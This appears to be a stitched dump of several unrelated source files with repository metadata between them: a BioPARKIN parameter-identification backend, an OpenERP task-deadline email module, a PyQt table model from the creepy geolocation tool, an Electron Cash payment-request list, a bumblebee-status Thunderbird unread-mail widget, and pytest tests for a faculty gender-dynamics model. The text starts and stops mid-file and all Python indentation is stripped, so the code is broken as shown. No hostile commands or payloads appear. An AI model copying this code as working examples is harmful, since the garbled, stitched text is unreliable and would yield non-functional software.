Further prepares the BioSystem so that it can be used by a GaussNewton object.
Also creates said GaussNewton object and all the input it needs.
"""
# get selected parameters (exclude non-constant ones, e.g. with assignm. rules)
if mode == TASK_PARAMETER_IDENTIFICATION:
self.selectedParams = [param for param, isSelected in self.paramToEstimateMap.items() if isSelected and param.isConstant()]
elif mode == TASK_SENSITIVITY_OVERVIEW or mode == TASK_SENSITIVITIES_DETAILS:
self.selectedParams = [param for param, isSelected in self.paramToSensitivityMap.items() if isSelected and param.isConstant()]
if not self.selectedParams:
logging.error("No parameters selected.")
return False
if mode == TASK_PARAMETER_IDENTIFICATION:
self.timepointVector, self.measurementMapVector = self._getBioParkinCppCompatibleMeasurements()
if not self.measurementMapVector or not self.timepointVector:
logging.debug("ParkinCppBackend._doParameterEstimation(): Could not obtain timepoints and/or datapoints.")
return False
self.bioSystem.setMeasurementList(self.timepointVector, self.measurementMapVector)
# set up parameters for BioProcessor
self.paramMap = Param()
self.paramThresholdMap = Param()
for selectedParam in self.selectedParams:
combinedID = selectedParam.getCombinedId() # includes "scope_"
value = self.mainModel.getValueFromActiveSet(combinedID)
self.paramMap[combinedID] = value
thres = selectedParam.getThreshold()
if not thres:
logging.error("There are Parameters for which thresholds have not been set. Computing sensitivities is not possible without thresholds. Please, set thresholds!")
return False
self.paramThresholdMap[combinedID] = thres
#
self.bioProcessor.setCurrentParamValues(self.paramMap)
self.bioProcessor.setCurrentParamThres(self.paramThresholdMap)
# set up Species thresholds
self.speciesThresholdMap = Param()
for species in self.odeManager.speciesList:
speciesID = species.getId()
thres = species.getThreshold()
if not thres:
continue
self.speciesThresholdMap[speciesID] = thres
if self.speciesThresholdMap:
self.bioProcessor.setCurrentSpeciesThres(self.speciesThresholdMap)
self.iOpt = self.bioProcessor.getIOpt()
self.iOpt.mode = 0 # 0:normal run, 1:single step
self.iOpt.jacgen = int(self.settings[settingsandvalues.SETTING_JACOBIAN]) # 1:user supplied Jacobian, 2:num.diff., 3:num.diff.(with feedback)
self.iOpt.qrank1 = False # allow Broyden rank-1 updates if __true__
self.iOpt.nonlin = int(self.settings[settingsandvalues.SETTING_PROBLEM_TYPE]) # 1:linear, 2:mildly nonlin., 3:highly nonlin., 4:extremely nonlin.
self.iOpt.rscal = int(self.settings[settingsandvalues.SETTING_RESIDUAL_SCALING]) # 1:use unchanged fscal, 2:recompute/modify fscal, 3:use automatic scaling only
self.iOpt.mprmon = 2
self.iOpt.mprerr = 1
self.iOpt.itmax = int(self.settings[backend.settingsandvalues.SETTING_MAX_NUM_NEWTON_STEPS])
self.bioProcessor.setIOpt(self.iOpt)
# consider contstarints for both parameter identification *and* sensitivities
# global constraints
globalConstraintsType = self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS]
trans, upperbounds, lowerbounds = [],[],[]
if not self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS_PER_PARAMETER]:
trans = [settingsandvalues.OPTIONS_PARAMETER_CONSTRAINT_TYPES.index(globalConstraintsType)] * len(self.selectedParams)
lowerbounds = [self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS_LOWERBOUND]] * len(self.selectedParams)
upperbounds = [self.settings[settingsandvalues.SETTING_PARAMETER_CONSTRAINTS_UPPERBOUND]] * len(self.selectedParams)
else: #local constraints
for selectedParam in self.selectedParams:
typeInt = settingsandvalues.OPTIONS_PARAMETER_CONSTRAINT_TYPES.index(str(selectedParam.getConstraintType()))
trans.append(typeInt)
lowerbounds.append(float(selectedParam.getConstraintLowerBound()))
upperbounds.append(float(selectedParam.getConstraintUpperBound()))
trans = Vector(ValueList(trans))
lowerbounds = Vector(ValueList(lowerbounds))
upperbounds = Vector(ValueList(upperbounds))
self.bioProcessor.setParameterConstraints(trans, lowerbounds, upperbounds)
return True
def _doParameterEstimation(self):
"""
Create the Gauss Newton object (involves calling ._setUpGaussNewton())
and run the parameter identification.
"""
isSetUp = self._setUpBioProcessor(mode = TASK_PARAMETER_IDENTIFICATION)
if not isSetUp:
logging.error("Could not start parameter identification.")
return False
if not self.bioProcessor:
return False
xtol = float(self.settings[settingsandvalues.SETTING_XTOL])
# 21.08.12 td : counterpart of logging unification test
out = StdOutWrapper()
self.bioProcessor.setLogStream(MakeCppOStream(sys.stdout))
error = self.bioProcessor.identifyParameters(xtol=xtol)
out.close()
# 24.07.12 td
# condition error == 0 for successful convergence is too much to ask
# if error != 0:
if error > 2:
logging.error("Error during parameter identification in PARKINcpp.")
return False
paramMap = self.bioProcessor.getIdentificationResults()
# convert results; put into class variable
self.estimatedParams = OrderedDict()
for paramID, value in paramMap.items():
self.estimatedParams[paramID] = value
# 26.04.12 td
# compute RMS values according to available measurement points and
# for each species seperately (in relation!)
measMapVector = self.bioSystem.getMeasurementList()
synMapVector = self.bioSystem.getSimTrajectoryList()
if measMapVector and synMapVector:
logging.info("------------------------------")
logging.info("Computing relative RMS values.")
self.relRMS = OrderedDict()
countMeas = 0
for i in xrange(len(measMapVector)):
measPointMap = measMapVector[i]
synPointMap = synMapVector[i]
for speciesID in measPointMap.keys():
(measVal, weight) = measPointMap[speciesID]
if speciesID in synPointMap:
(synVal, dummy) = synPointMap[speciesID]
else:
continue
dval = 0.0
countMeas += 1
if float(weight) != 0.0 and float(weight) != float("nan"):
dval = (float(measVal) - float(synVal)) / float(weight)
if speciesID in self.relRMS.keys():
self.relRMS[speciesID] += dval*dval
else:
self.relRMS[speciesID] = dval*dval
if countMeas > 0:
totRMS = sum([self.relRMS[spec] for spec in self.relRMS.keys()])
logging.info(" Total RMS**2: %e" % (float(totRMS)/float(countMeas)) )
for speciesID, rmsValue in self.relRMS.items():
logging.info(" (%5.2f%%) %e = relRMS[%s]**2 " % (
100.0*float(rmsValue)/float(totRMS), float(rmsValue)/float(countMeas), speciesID) )
else:
logging.warning(" No measurements present?!? ")
logging.info("------------------------------")
return True # computation successful
def _getBioParkinCppCompatibleMeasurements(self):
"""
Takes experimental data from the DataService and puts it into PARKINcpp classes.
"""
# get the currently loaded experimental data
dataService = DataService()
expData = dataService.get_selected_experimental_data() # get's the *datasets* that are selected (in the data browser)
if not expData or len(expData.items()) == 0:
logging.debug("ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): No Experimental Data.")
logging.info("No experimental data loaded. Can't estimate parameter values.")
return None, None
# Step 1: Create a global timepoint list. The number of times any timepoint occurs is the
# maximum of occurences within the Species.
timepointList = []
for dataSetID, dataSet in expData.items():
logging.debug("ParkinCppBacken._getBioParkinCppCompatibleMeasurements(): Getting timepoints from %s" % dataSetID)
for sbmlSpecies, entityData in dataSet.getData().items():
if not entityData.isSelected(): # ignores entity data that is not selected (i.e. non-selected columns in the data browser)
continue
speciesTimepointsList = []
speciesTimepointsSet = set()
for i, dataDescriptor in enumerate(entityData.dataDescriptors):
try:
if type(sbmlSpecies) is SBMLEntity:
speciesID = sbmlSpecies.getId()
else:
speciesID = str(sbmlSpecies)
timepoint = float(dataDescriptor)
# ignore timepoints that are outside of the current integration interval
if timepoint <= self.settings[settingsandvalues.SETTING_STARTTIME]\
or timepoint > self.settings[settingsandvalues.SETTING_ENDTIME]:
continue
speciesTimepointsList.append(timepoint) # may be unordered
speciesTimepointsSet.add(timepoint)
except Exception, e:
logging.debug(
"ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): Problem while creating global timepoint list with Species %s" % speciesID)
# Check timepoints of this Species and add them to the global list if needed.
for timepoint in speciesTimepointsSet:
countSpecies = speciesTimepointsList.count(timepoint)
countGlobal = timepointList.count(timepoint)
if countSpecies > countGlobal: # if this timepoint isn't included in the global list often enough
difference = countSpecies - countGlobal
toAdd = [timepoint for i in range(difference)]
timepointList.extend(toAdd) # add it as often as is needed
timepointList.sort() # sort timepoints ascending
# Step 2: Go through the local timepoints of each Species and put their data into the correct places in the global list
# prepare list with empty MeasurementPoints
datapointList = []
for i in xrange(len(timepointList)):
datapointList.append(MeasurementPoint())
for dataSetID, dataSet in expData.items():
#logging.debug("ODEManager: Getting timepoints from %s" % dataSetID)
for sbmlSpecies, entityData in dataSet.getData().items():
if not entityData.isSelected(): # ignores entity data that is not selected (i.e. non-selected columns in the data browser)
continue
countTimepoints = {}
for i, dataDescriptor in enumerate(entityData.dataDescriptors):
try:
if type(sbmlSpecies) is SBMLEntity:
speciesID = sbmlSpecies.getId()
else:
speciesID = str(sbmlSpecies)
timepoint = float(dataDescriptor)
# ignore timepoints that are outside of the current integration interval
if timepoint <= self.settings[settingsandvalues.SETTING_STARTTIME]\
or timepoint > self.settings[settingsandvalues.SETTING_ENDTIME]:
continue
# 31.07.12 td
# ignore datapoint if not set/loaded at all
if not entityData.datapoints[i]:
continue
dataPoint = float(entityData.datapoints[i])
# 26.07.12 td
try:
thres = abs(sbmlSpecies.getThreshold())
except:
thres = 0.0
try:
weightRaw = entityData.getWeights()[i]
weight = max( abs(float(weightRaw)), thres )
# weight /= sbmlSpecies.getThreshold()
# except: # take user-defined value if no float was provided by the loaded data
# weight = float(self.settings[settingsandvalues.SETTING_SD_SPECIES])
# 25.07.12 td
except: # take datapoint value if no float was provided by the loaded data (as in YeOldeParkin!)
weight = max( abs(dataPoint), thres )
except Exception, e:
logging.debug(
"ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): Problem while getting data of Species %s" % speciesID)
try:
if timepoint in countTimepoints.keys(): # already had this timepoint at least once
# handle non-unique timepoint
index = timepointList.index(timepoint) #always gets the first occurence of that timepoint
index += countTimepoints[timepoint] # this should yield the correct index
if speciesID in datapointList[index].keys():
logging.debug(
"ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): MeasurementPoint entry for Species %s at timepoint %s already there." % (
speciesID, timepoint))
datapointList[index][speciesID] = (dataPoint, weight)
countTimepoints[timepoint] += 1
else:
# handle new timepoint
index = timepointList.index(timepoint)
datapointList[index][speciesID] = (dataPoint, weight)
countTimepoints[timepoint] = 1
except Exception, e:
logging.debug("ParkinCppBackend._getBioParkinCppCompatibleMeasurements(): Error while trying to assign Species datapoint to global data list. Error: %s" % e)
measurementMapVector = MeasurementList(len(datapointList))
for i in xrange(len(datapointList)):
measurementMapVector[i] = datapointList[i]
timepointVector = Vector(ValueList(timepointList))
return (timepointVector, measurementMapVector)
def _handleEstimatedParamResults(self):
"""
Takes the previously computed parameter values (stored in a OrderedDict), wraps
them into EntityData objects and a DataSet and puts that into the DataService.
"""
estimatedParamSet = DataSet(None)
estimatedParamSet.setId("Identified Parameter Values")
estimatedParamSet.setType(services.dataservice.ESTIMATED_PARAMS)
selected = {}
for selectedParam in self.selectedParams:
selected[selectedParam.getCombinedId()] = selectedParam
for i, (paramID, estimatedValue) in enumerate(self.estimatedParams.items()):
if not paramID in selected.keys():
continue
param = selected[paramID] # if paramID is in selected dict, get the related sbmlEntity object
paramData = EntityData()
paramData.setId(param.getId())
paramData.setType(datamanagement.entitydata.TYPE_PARAMETERS_ESTIMATED)
paramData.setAssociatedDataSet(estimatedParamSet)
paramData.dataDescriptors = ["Identified Value"]
paramData.datapoints = [estimatedValue]
paramData.sbmlEntity = param
estimatedParamSet.setData(paramData, keyEntity=param)
self.dataService.add_data(estimatedParamSet)
| lgpl-3.0 | 6,877,674,015,434,271,000 | 44.678694 | 192 | 0.643596 | false |
iw3hxn/LibrERP | task_expired_information/model/task.py | 1 | 5561 | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2016 Didotech SRL
#
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
#
from openerp.osv import fields, osv
from openerp.tools import html2text
from datetime import *
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
import logging
_logger = logging.getLogger('task')
class task_expired_config(osv.Model):
"""
"""
_name = 'task.expired.config'
def default_get(self, cr, uid, fields, context=None):
if context is None:
context = {}
res = super(task_expired_config, self).default_get(cr, uid, fields,
context=context)
model_ids = self.search(cr, uid, [], context=context)
if model_ids:
return self.read(cr, uid, model_ids[0], [], context=context)
return res
_columns = {
'without_change': fields.integer('Without Changes Days',
help='Days number that tasks may '
'have without changes.\n'
'When these days finish an '
'email information is sent'),
'before_expiry': fields.integer('Before Expiry',
help='Number days before to the '
'expiry day to send an alert '
'for email'),
'without_change_tmpl_id': fields.many2one('email.template', 'Template Without Changes', domain="[('model_id', '=', 'project.task')]", required=True),
'before_expiry_tmpl_id': fields.many2one('email.template', 'Template Without Changes', domain="[('model_id', '=', 'project.task')]", required=True)
}
def create_config(self, cr, uid, ids, context=None):
if context is None:
context = {}
model_ids = self.search(cr, uid, [], context=context)
dict_read = self.read(cr, uid, ids[0], [], context=context)
if model_ids:
self.write(cr, uid, model_ids, {
'before_expiry': dict_read.get('before_expiry'),
'without_change_tmpl': dict_read.get('without_change_tmpl_id')[0],
'without_change': dict_read.get('without_change'),
'before_expiry_tmpl_id': dict_read.get('before_expiry_tmpl_id')[0],
}, context=context)
return {'type': 'ir.actions.act_window_close'}
return {'type': 'ir.actions.act_window_close'}
def send_expiration_message(self, cr, uid, context=None):
context = context or self.pool['res.users'].context_get(cr, uid)
message_obj = self.pool['mail.message']
task_obj = self.pool['project.task']
work_obj = self.pool['project.task.work']
config_ids = self.search(cr, uid, [], context=context)
if config_ids:
config_brw = self.browse(cr, uid, config_ids[0], context=context)
today = date.today()
before_expiry = today + timedelta(days=config_brw.before_expiry)
last_change = today - timedelta(days=config_brw.without_change)
today = today.strftime('%Y-%m-%d')
before_expiry = before_expiry.strftime('%Y-%m-%d')
last_change = last_change.strftime('%Y-%m-%d')
task_ids = task_obj.search(cr, uid, [('state', 'not in', ('done', 'cancelled'))], context=context)
for task in task_obj.browse(cr, uid, task_ids, context):
no_change = False
near_deadline = False
last_message_ids = message_obj.search(cr, uid, [('res_id', '=', task.id), ('model', '=', 'project.task')], context=context, order='date desc')
last_fecha = last_message_ids and message_obj.browse(cr, uid, last_message_ids[0]).date
if work_obj.search(cr, uid, [('date', '<=', last_change), ('task_id', '=', task.id)], context=context) or last_fecha and last_fecha <= last_change:
no_change = True
if task.date_deadline and task.date_deadline == before_expiry:
near_deadline = True
if no_change:
self.pool['email.template'].send_mail(cr, uid, config_brw.without_change_tmpl_id.id, task.id, force_send=False, context=context)
_logger.info(u'Sent Email without change for {name} #{task_id}, email notification sent.'.format(name=self._name, task_id=task.id))
if near_deadline:
self.pool['email.template'].send_mail(cr, uid, config_brw.before_expiry_tmpl_id.id, task.id, force_send=False, context=context)
_logger.info(u'Sent Email near deadline for {name} #{task_id}, email notification sent.'.format(name=self._name, task_id=task.id))
return True
| agpl-3.0 | 1,825,388,067,127,048,000 | 48.651786 | 163 | 0.579392 | false |
jkakavas/creepy | creepy/models/ProjectWizardPossibleTargetsTable.py | 1 | 3572 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from PyQt4.QtCore import QVariant, QAbstractTableModel, Qt
from PyQt4.Qt import QPixmap, QIcon, QMimeData, QByteArray, QDataStream, QIODevice
import os
from utilities import GeneralUtilities
class ProjectWizardPossibleTargetsTable(QAbstractTableModel):
def __init__(self, targets, parents=None):
super(ProjectWizardPossibleTargetsTable, self).__init__()
self.targets = targets
def rowCount(self, index):
return len(self.targets)
def columnCount(self, index):
return 5
def headerData(self, section, orientation, role=Qt.DisplayRole):
if role == Qt.TextAlignmentRole:
if orientation == Qt.Horizontal:
return QVariant(int(Qt.AlignLeft|Qt.AlignVCenter))
return QVariant(int(Qt.AlignRight|Qt.AlignVCenter))
if role != Qt.DisplayRole:
return QVariant()
if orientation == Qt.Horizontal:
if section == 0:
return QVariant('Plugin')
elif section == 1:
return QVariant('Picture')
elif section == 2:
return QVariant('Username')
elif section == 3:
return QVariant('Full Name')
elif section == 4:
return QVariant('User Id')
return QVariant(int(section + 1))
def data(self, index, role):
target = self.targets[index.row()]
if index.isValid() and (0 <= index.row() < len(self.targets)) and target:
column = index.column()
if role == Qt.DecorationRole:
if column == 1:
picturePath = os.path.join(GeneralUtilities.getTempDir(),
target['targetPicture'])
if picturePath and os.path.exists(picturePath):
pixmap = QPixmap(picturePath)
return QIcon(pixmap.scaled(30, 30, Qt.IgnoreAspectRatio, Qt.FastTransformation))
else:
pixmap = QPixmap(':/creepy/user')
pixmap.scaled(20, 20, Qt.IgnoreAspectRatio)
return QIcon(pixmap)
if role == Qt.DisplayRole:
if column == 0:
return QVariant(target['pluginName'])
elif column == 1:
return QVariant()
elif column == 2:
return QVariant(target['targetUsername'])
elif column == 3:
return QVariant(target['targetFullname'])
elif column == 4:
return QVariant(target['targetUserid'])
else:
return QVariant()
def flags(self, index):
if not index.isValid():
return Qt.ItemIsEnabled
return Qt.ItemFlags(QAbstractTableModel.flags(self, index) | Qt.ItemIsDragEnabled|Qt.ItemIsDropEnabled)
def mimeTypes(self):
return ['application/target.tableitem.creepy']
def mimeData(self, indices):
mimeData = QMimeData()
encodedData = QByteArray()
stream = QDataStream(encodedData, QIODevice.WriteOnly)
for index in indices:
if index.column() == 1:
d = QVariant(self.data(index, Qt.DecorationRole))
else:
d = QVariant(self.data(index, Qt.DisplayRole).toString())
stream << d
mimeData.setData('application/target.tableitem.creepy', encodedData)
return mimeData | gpl-3.0 | -1,807,698,924,184,300,300 | 39.602273 | 111 | 0.555431 | false |
fyookball/electrum | gui/qt/request_list.py | 1 | 7117 | #!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from electroncash.address import Address
from electroncash.i18n import _
from electroncash.util import format_time, age
from electroncash.plugins import run_hook
from electroncash.paymentrequest import pr_tooltips, PR_UNKNOWN
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import QTreeWidgetItem, QMenu
from .util import MyTreeWidget, pr_icons
class RequestList(MyTreeWidget):
filter_columns = [0, 1, 2, 3, 4] # Date, Account, Address, Description, Amount
def __init__(self, parent):
MyTreeWidget.__init__(self, parent, self.create_menu, [_('Date'), _('Address'), '', _('Description'), _('Amount'), _('Status')], 3, deferred_updates=False)
self.currentItemChanged.connect(self.item_changed)
self.itemClicked.connect(self.item_changed)
self.setSortingEnabled(True)
self.setColumnWidth(0, 180)
self.hideColumn(1)
self.wallet = parent.wallet
def item_changed(self, item):
if item is None:
return
if not item.isSelected():
return
addr = item.data(0, Qt.UserRole)
req = self.wallet.receive_requests.get(addr)
if not req:
return
expires = age(req['time'] + req['exp']) if req.get('exp') else _('Never')
amount = req['amount']
opr = req.get('op_return') or req.get('op_return_raw')
opr_is_raw = bool(req.get('op_return_raw'))
message = self.wallet.labels.get(addr.to_storage_string(), '')
self.parent.receive_address = addr
self.parent.receive_address_e.setText(addr.to_full_ui_string())
self.parent.receive_message_e.setText(message)
self.parent.receive_amount_e.setAmount(amount)
self.parent.expires_combo.hide()
self.parent.expires_label.show()
self.parent.expires_label.setText(expires)
self.parent.receive_opreturn_rawhex_cb.setChecked(opr_is_raw)
self.parent.receive_opreturn_e.setText(opr or '')
self.parent.save_request_button.setEnabled(False)
self.parent.cash_account_e.set_cash_acct()
def select_item_by_address(self, address):
self.setCurrentItem(None)
for i in range(self.topLevelItemCount()):
item = self.topLevelItem(i)
if item and item.data(0, Qt.UserRole) == address:
self.setCurrentItem(item)
return
def on_edited(self, item, column, prior):
'''Called only when the text in the memo field actually changes.
Updates the UI and re-saves the request. '''
super().on_edited(item, column, prior)
self.setCurrentItem(item)
addr = item.data(0, Qt.UserRole)
req = self.wallet.receive_requests.get(addr)
if req:
self.parent.save_payment_request()
def chkVisible(self):
# hide receive tab if no receive requests available
b = len(self.wallet.receive_requests) > 0 and self.parent.isVisible()
self.setVisible(b)
self.parent.receive_requests_label.setVisible(b)
if not b:
self.parent.expires_label.hide()
self.parent.expires_combo.show()
def on_update(self):
self.chkVisible()
# update the receive address if necessary
current_address_string = self.parent.receive_address_e.text().strip()
current_address = Address.from_string(current_address_string) if len(current_address_string) else None
domain = self.wallet.get_receiving_addresses()
addr = self.wallet.get_unused_address()
if current_address not in domain and addr:
self.parent.set_receive_address(addr)
# clear the list and fill it again
item = self.currentItem()
prev_sel = item.data(0, Qt.UserRole) if item else None
self.clear()
for req in self.wallet.get_sorted_requests(self.config):
address = req['address']
if address not in domain:
continue
timestamp = req.get('time', 0)
amount = req.get('amount')
expiration = req.get('exp', None)
message = req.get('memo', '')
date = format_time(timestamp)
status = req.get('status')
signature = req.get('sig')
requestor = req.get('name', '')
amount_str = self.parent.format_amount(amount) if amount else ""
item = QTreeWidgetItem([date, address.to_ui_string(), '', message,
amount_str, _(pr_tooltips.get(status,''))])
item.setData(0, Qt.UserRole, address)
if signature is not None:
item.setIcon(2, QIcon(":icons/seal.svg"))
item.setToolTip(2, 'signed by '+ requestor)
if status is not PR_UNKNOWN:
item.setIcon(6, QIcon(pr_icons.get(status)))
self.addTopLevelItem(item)
if prev_sel == address:
self.setCurrentItem(item)
def create_menu(self, position):
item = self.itemAt(position)
if not item:
return
self.setCurrentItem(item) # sometimes it's not the current item.
addr = item.data(0, Qt.UserRole)
req = self.wallet.receive_requests[addr]
column = self.currentColumn()
column_title = self.headerItem().text(column)
column_data = item.text(column)
menu = QMenu(self)
menu.addAction(_("Copy {}").format(column_title), lambda: self.parent.app.clipboard().setText(column_data.strip()))
menu.addAction(_("Copy URI"), lambda: self.parent.view_and_paste('URI', '', self.parent.get_request_URI(addr)))
menu.addAction(_("Save as BIP70 file"), lambda: self.parent.export_payment_request(addr))
menu.addAction(_("Delete"), lambda: self.parent.delete_payment_request(addr))
run_hook('receive_list_menu', menu, addr)
menu.exec_(self.viewport().mapToGlobal(position))
| mit | -1,929,781,626,192,813,300 | 43.761006 | 163 | 0.642968 | false |
tobi-wan-kenobi/bumblebee-status | bumblebee_status/modules/contrib/thunderbird.py | 1 | 2547 | # pylint: disable=C0111,R0903
"""
Displays the unread emails count for one or more Thunderbird inboxes
Parameters:
* thunderbird.home: Absolute path of your .thunderbird directory (e.g.: /home/pi/.thunderbird)
* thunderbird.inboxes: Comma separated values for all MSF inboxes and their parent directory (account) (e.g.: imap.gmail.com/INBOX.msf,outlook.office365.com/Work.msf)
Tips:
* You can run the following command in order to list all your Thunderbird inboxes
find ~/.thunderbird -name '*.msf' | awk -F '/' '{print $(NF-1)"/"$(NF)}'
contributed by `cristianmiranda <https://github.com/cristianmiranda>`_ - many thanks!
"""
import core.module
import core.widget
import core.decorators
import core.input
import util.cli
class Module(core.module.Module):
@core.decorators.every(minutes=1)
def __init__(self, config, theme):
super().__init__(config, theme, core.widget.Widget(self.thunderbird))
self.__total = 0
self.__label = ""
self.__inboxes = []
self.__home = self.parameter("home", "")
inboxes = self.parameter("inboxes", "")
if inboxes:
self.__inboxes = util.format.aslist(inboxes)
def thunderbird(self, _):
return str(self.__label)
def update(self):
try:
self.__total = 0
self.__label = ""
stream = self.__getThunderbirdStream()
unread = self.__getUnreadMessagesByInbox(stream)
counts = []
for inbox in self.__inboxes:
count = unread[inbox]
self.__total += int(count)
counts.append(count)
self.__label = "/".join(counts)
except Exception as err:
self.__label = err
def __getThunderbirdStream(self):
cmd = (
"find "
+ self.__home
+ " -name '*.msf' -exec grep -REo 'A2=[0-9]' {} + | grep"
)
for inbox in self.__inboxes:
cmd += " -e {}".format(inbox)
cmd += "| awk -F / '{print $(NF-1)\"/\"$(NF)}'"
return util.cli.execute(cmd, shell=True).strip().split("\n")
def __getUnreadMessagesByInbox(self, stream):
unread = {}
for line in stream:
entry = line.split(":A2=")
inbox = entry[0]
count = entry[1]
unread[inbox] = count
return unread
def state(self, widget):
if self.__total > 0:
return ["warning"]
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| mit | -1,776,329,110,352,044,500 | 27.617978 | 170 | 0.566549 | false |
00krishna-research/py_university_gender_dynamics_pkg | tests/test_pyugend.py | 1 | 8479 | import pytest
from models.Models import Base_model
from models.Basic_stochastic_model import Basic_stochastic_model
from models.Stochastic_model_with_promotion import Stochastic_model_with_promotion
from models.Replication_model import Replication_model
from models.Stochastic_model_with_promotion_and_first_hiring import Stochastic_model_with_promotion_and_first_hiring
from comparisons.Comparison import Comparison
from models.Basic_stochastic_model_fixed_promotion import Basic_stochastic_model_fixed_promotion
import numpy as np
import pandas as pd
@pytest.fixture
def mock_data():
return ({'number_of_females_1': 14,
'number_of_females_2': 3,
'number_of_females_3': 19,
'number_of_males_1': 37,
'number_of_males_2': 28,
'number_of_males_3': 239,
'number_of_initial_vacancies_1': 5.303,
'number_of_initial_vacancies_2': 5.9,
'number_of_initial_vacancies_3': 8.31,
'hiring_rate_women_1': 0.310,
'hiring_rate_women_2': 0.222,
'hiring_rate_women_3': 0,
'attrition_rate_women_1': 0,
'attrition_rate_women_2': 0,
'attrition_rate_women_3': 0.017,
'attrition_rate_men_1': 0.009,
'attrition_rate_men_2': 0.017,
'attrition_rate_men_3': 0.033,
'probablity_of_outside_hire_1': 1,
'probability_of_outside_hire_2': 0.158,
'probability_of_outside_hire_3': 0.339,
'female_promotion_probability_1': 0.122,
'female_promotion_probability_2': 0.188,
'male_promotion_probability_1': 0.19,
'male_promotion_probability_2': 0.19,
'max_threshold': 0.1,
'prob_random_growth': 0.1,
'duration': 40})
def test_Base_model(mock_data):
assert isinstance(Base_model(**mock_data), Base_model)
def test_base_model_run(mock_data):
t = Base_model(**mock_data)
t.run_model()
assert (isinstance(t.res, np.ndarray))
def test_base_model_persistence(mock_data):
t = Base_model(**mock_data)
assert (t.nf1 == 14)
def test_base_model_multiple_runs(mock_data):
t = Basic_stochastic_model(**mock_data)
assert (isinstance(t.run_multiple(10), int))
def test_base_model_multiple_runs_persistent_state(mock_data):
t = Basic_stochastic_model(**mock_data)
t.run_multiple(10)
assert (isinstance(t.mean_matrix, np.ndarray))
def test_base_model_parameter_sweep(mock_data):
t = Stochastic_model_with_promotion(**mock_data)
v = t.run_parameter_sweep(12, 'female_pp_1', 0.1, 0.3, 2)
assert (isinstance(v, int))
def test_base_model_plot_multiple_runs(mock_data):
t = Basic_stochastic_model(**mock_data)
t.run_multiple(10)
t.plot_multiple_runs_detail()
#
# def test_base_model_multiple_runs_gender_prop(mock_data):
# t = Basic_stochastic_model(**mock_data)
# t.run_multiple(10)
# t.plot_multiple_runs_gender_prop()
def test_basic_stochastic_model(mock_data):
assert (isinstance(Basic_stochastic_model(**mock_data),
Basic_stochastic_model))
def test_basic_stochastic_model_run(mock_data):
t = Basic_stochastic_model(**mock_data).run_model()
assert isinstance(t, np.recarray)
def test_basic_stochastic_model_run_with_saved_data(mock_data):
t = Basic_stochastic_model(**mock_data)
t.run_model()
assert isinstance(t.run, np.recarray)
def test_basic_stochastic_model_promotion_probability_recovery(mock_data):
t = Basic_stochastic_model(**mock_data)
assert (t.female_promotion_probability_2 == 0.188)
def test_replication_model(mock_data):
t = Replication_model(**mock_data)
t.run_model()
assert (isinstance(t.run, np.ndarray))
# def test_base_model_multiple_runs_gender_prop(mock_data):
# t = Replication_model(**mock_data)
# t.run_multiple(10)
# t.plot_multiple_runs_gender_prop()
# def test_excel_export(mock_data):
# t = Basic_stochastic_model(**mock_data)
# t.export_model_run()
# assert(isinstance(t,Basic_stochastic_model))
def test_stochastic_model_with_hiring_first(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
t.run_model()
assert (isinstance(t.run, np.ndarray))
def test_stochastic_model_with_hiring_first_multiple(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
t.run_multiple(10)
assert (isinstance(t.mean_matrix, np.ndarray))
def test_comparison_model_plot_detail(mock_data):
modlist = list([Replication_model(**mock_data),
Basic_stochastic_model(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_comparison_detail(10)
def test_comparison_model_param_sweep(mock_data):
modlist = list([Replication_model(**mock_data),
Basic_stochastic_model(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_parameter_sweep_gender_proportion(10, 'female_promotion_probability_2', 0.1, 0.5, 8)
def test_comparison_model_param_sweep_detail(mock_data):
modlist = list([Replication_model(**mock_data),
Basic_stochastic_model(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_parameter_sweep_detail(10, 'female_promotion_probability_2', 0.1, 0.5, 8)
def test_base_model_probability_calc_detail_array(mock_data):
